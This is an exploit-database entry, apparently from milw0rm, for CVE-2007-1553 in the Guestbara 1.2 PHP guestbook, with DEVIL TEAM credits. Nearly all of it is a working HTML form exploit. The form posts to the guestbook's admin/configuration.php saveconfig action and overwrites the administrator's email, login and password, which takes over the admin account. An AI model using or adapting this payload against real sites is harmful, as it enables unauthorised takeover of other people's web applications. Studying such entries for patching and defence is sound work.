Guestbara 1.2 - Change Admin Login and Password
Author: Kacper
type: webapps
platform: php
port:
date_added: 2007-03-17
date_updated:
verified: 1
codes: OSVDB-34519;CVE-2007-1553
tags:
aliases:
screenshot_url:
application_url:
<html>
<title>Guestbara <= 1.2 Change admin login & password exploit by Kacper</title>
<table border=0 cellspacing=0 cellpadding=0 align='center'>
<form method='post' action='http://127.0.0.1/guestbook_path/admin/configuration.php?action=saveconfig&zapis=ok'><tr>
<tr><td width=200>Admin Email</td><td><input type='text' name='admin_mail' class='textfield' value=''></td></tr>
<tr><td width=200>Admin Name</td><td><input type='text' name='login' class='textfield' value=''></td></tr>
<tr><td width=200>Admin Pass</td><td><input type='password' name='pass' class='textfield' value=''></td></tr>
<tr><td colspan=2 align=center>
<p>
<input type='submit' name='submit' value='Zachowaj'>
</p>
<p>by Kacper </p>
<p>for</p>
<p><a href="http://www.rahim.webd.pl/" target="_blank">DEVIL TEAM </a></p></td></tr>
</form></table>
<p> </p>
<p align="center">script download: http://www.hotscripts.pl/produkt-3051.html</p>
<p align="center">Greetz @ll DEVIL TEAM </p>
</html>
# milw0rm.com [2007-03-18]